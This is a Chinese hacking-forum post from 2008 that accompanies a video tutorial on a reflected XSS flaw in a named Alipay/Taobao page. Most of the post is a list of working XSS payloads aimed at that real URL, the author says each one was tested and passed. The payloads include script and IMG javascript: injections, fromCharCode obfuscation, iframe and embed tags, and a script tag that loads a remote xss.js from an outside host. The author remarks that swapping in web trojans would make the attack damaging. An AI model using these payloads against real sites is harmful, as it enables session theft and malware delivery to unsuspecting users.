地方网

搜索

[黑客动画] 淘宝的xss跨站漏洞

[复制链接]
admin 发表于 2008-8-19 15:33:19 | 显示全部楼层 |阅读模式
软件简介:
8 i+ T, w% ~0 D$ a1 w3 o  J: ~6 G大家好 我是凯文比比奇; e1 `' r+ R( A5 P) ?
今天给大家带来一个关于xss跨站的教程" R: ]0 g( c( T+ J6 _3 _* I7 ?, I) N
这是漏洞地址http://union.alipay.com/alipay/choujiang1/order.php2 m! j2 r. w0 t8 y8 ?
好了`大家看我操作啦 是淘宝的6 b( Y1 ~9 F- V& V  T; I: I
看到了没6 l* i1 {0 j$ d- e! n# n
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=%3Cstrong%3E%B7%C7%B3%A3%B8%D0%D0%BB%C4%FA%B5%C4%B2%CE%D3%EB%A3%AC%B4%CB%BD%BB%D2%D7%BA%C5%B2%BB%C4%DC%B2%CE%D3%EB%B8%C3%CA%B1%B6%CE%B9%CE%BD%B1%0D%0A%CD%AC%CA%B1%C2%FA%D7%E3%D2%D4%CF%C2%CC%F5%BC%FE%B5%C4%BD%BB%D2%D7%BA%C5%BF%C9%B2%CE%D3%EB%B1%BE%C6%DA%B9%CE%BD%B1%A3%BA%3C%2Fstrong%3E%3Cbr%2F%3E%3Cul%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E%BB%EE%B6%AF%C6%DA%BC%E4%D4%DA%CC%D4%B1%A6%B9%BA%CE%EF%A3%AC%CA%D7%B4%CE%B8%B6%BF%EE%B5%BD%D6%A7%B8%B6%B1%A6%B5%C4%BD%BB%D2%D7%BA%C5%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F18-7%2F25%CD%EA%B3%C9%B8%B6%BF%EE%B5%C4%BB%E1%D4%B1%D4%DA7%2F27-8%2F1%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3Cli%3E%3Cspan%3E%A1%A4%3C%2Fspan%3E7%2F26-7%2F31%CD%EA%B3%C9%BD%BB%D2%D7%B5%C4%BB%E1%D4%B1%D4%DA8%2F2-8%2F5%C6%DA%BC%E4%C6%BE%B8%C3%B1%CA%BD%BB%D2%D7%B5%C4%BD%BB%D2%D7%BA%C5%B2%CE%D3%EB%B9%CE%BD%B1%3C%2Fli%3E%3C%2Ful%3E# V, p( k/ S9 M! l6 a7 ]
这是url编码 ' ~6 V4 g; t( q7 ~% Q7 G' B9 i; r
支付宝交易号是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=这个页面来传递的,而url编码是http识得的
4 P% {1 G$ {* _3 A好了,既然这样那么我们可以来构造语句,当然这里是存在xss跨站漏洞的 我们来测试一下,这样上不行的 我们再来看1 s% A8 O+ G# L- @9 p
看到了吗。是可以的,看到了没``好了,我们再来看看其他的几种xss测试代码' H  F- |4 i% q; S  C$ l+ S8 \
都行的,下面的这些测试代码我都测试过,都通过,! g4 B: c$ V( }/ ?: v7 d
测试代码:
& W; S: ]( h$ ohttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=scriptalert(497751579)/script" ?; y& E6 V! T  l$ O4 ?1 Y
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=SCRIPT SRC=http://ha.ckers.org/xss.js/SCRIPT这段是利用script/script标签插如js脚本$ V# Q' }: ]) `6 ?
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert('XSS');/ Q% M9 K. Z$ k1 a5 A9 j& w- k
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert(XSS)
4 V# g* u- L0 Z! }" R+ _http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=`javascript:alert(RSnake says, 'XSS')`这三种都是一样的* r1 `* F* y7 J5 V9 [- E  O+ z
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IMG SRC=javascript:alert(String.fromCharCode(83,83,83))利用js编码fromCharCode(83,83,83)达到跨站目的
" Y7 ^/ k& K" E9 ~5 Fhttp://union.alipay.com/alipay/choujiang1/ordernotice.php?info=IFRAME SRC=javascript:alert('XSS');/IFRAME框架,懂挂马的朋友都知道的% w, r* s, d7 T! C/ h
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=EMBED SRC=http://union.alipay.com/alipay/imagefile/market/cj_index.swf AllowScriptAccess=always/EMBED这段xss是利用html里面的embed/embed插入.swf动画% L6 _; Q) U  b6 G% a" g5 T
http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=SCRIPT SRC=http://union.alipay.com/alipay/imagefile/market/cj_02.jpg/SCRIPT这段是src带插入图片的
/ Q" D) n9 E, e0 ?# b; T0 T! }http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=A%20HREF=http://www.baidu.com/administrator/A超连接# V* z( V9 d- ~8 R' y9 J7 {
通过a href=/a来插入超连接的2 X; k6 u% k+ |! v$ z

/ A; I6 K( ~9 H8 }- r5 d( `好了。来总结一下1 d+ B4 I, H7 |
该跨站是通过http://union.alipay.com/alipay/choujiang1/ordernotice.php?info=地址传递html值从而存在跨站的+ E  ^' C& z7 K0 W: S! n) h4 ^2 h
这个漏洞也有人发现过,这里只是通过教程发出来 让大家知道跨站的危害 ,假如我们把上面这些跨站代码里面的一些javascript脚本或是swf等利用html潜入的文件改成网马之类的就存在很大的危害噢``
6 ?' y1 v, V3 V好了 教程就到这里吧 有什么不懂的问题就加我好了 Q:49771579
/ y6 z/ R- K4 S3 F' a最后希望黑鹰管理员给我发一个邀请码咯 好方便以后去黑鹰和大家共同交流学习 Email:service-mail@163.com! ]5 [& i. K4 F6 f
谢谢大家观看 拜拜``
2 M. R: T, Z: g" R下载地址:
2008-8-19 15:33 上传
下载权限:
版本vip会员
本地下载 检测资源   提取码: 需要终身vip或更高权限
有些游戏资源需要vip下载开通请点击开通vip
回复

使用道具 举报

全部回复0 显示全部楼层

发表回复

您需要登录后才可以回帖 登录 | 欢迎注册

本版积分规则

联系客服 关注微信 下载APP 返回顶部 返回列表